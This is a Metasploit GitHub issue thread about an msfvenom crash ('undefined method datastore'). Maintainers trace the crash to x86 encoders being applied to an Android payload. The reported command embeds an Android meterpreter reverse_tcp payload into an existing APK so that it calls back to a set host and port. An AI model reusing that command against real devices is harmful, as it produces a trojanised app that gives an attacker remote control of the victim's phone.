### ISSUE TITLE
Error: undefined method `datastore' for nil:NilClass

### ISSUE THREAD

**Issue by nima9876** [rapid7/metasploit-framework#13156]
I am new in kali linux ...
When I run msfvenom -a java --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.2.187 LPORT=1234 -e x86/shikata_ga_nai -i 2 R -x /root/Desktop/Terminus.apk -k | msfvenom -a java --platform android -e x86/jmp_call_additive -i 3 -o /root/Desktop/terminus3.apk
it shows me : 
Error: undefined method `datastore' for nil:NilClass
What does it mean?And how can I solve this?

**Comment by adfoster-r7** [comment]
Error confirmed on master with some extra logging in place:

```
./msfvenom -a java --platform android -p android/meterpreter/reverse_tcp LHOST=192.168.2.187 LPORT=1234 -e x86/shikata_ga_nai -i 2 R -x ./Terminus.apk -k | ./msfvenom -a java --platform android -e x86/jmp_call_additive -i 3 -o ./terminus3.apk
Attempting to read payload from STDIN...
Payload size: 10183 bytes

Error: undefined method `datastore' for nil:NilClass
metasploit-framework/lib/msf/core/payload_generator.rb:349:in `generate_java_payload'
metasploit-framework/lib/msf/core/payload_generator.rb:383:in `generate_payload'
./msfvenom:457:in `<main>'
```

**Comment by jmartin-r7** [comment]
These encoders apply to `x86` executables, what is the purpose attempting to apply them to java and android objects?

There is an error here that should be captured and reported more clearly.   In this case an arch mismatch should be reported as the `apk` format is not an x86 32-bit binary executable.

**Comment by jmartin-r7** [comment]
A bit dated but still valid explanation of what `-e` encoders do.

https://failingsilently.wordpress.com/2017/08/05/msfvenom-encoders-and-formats/
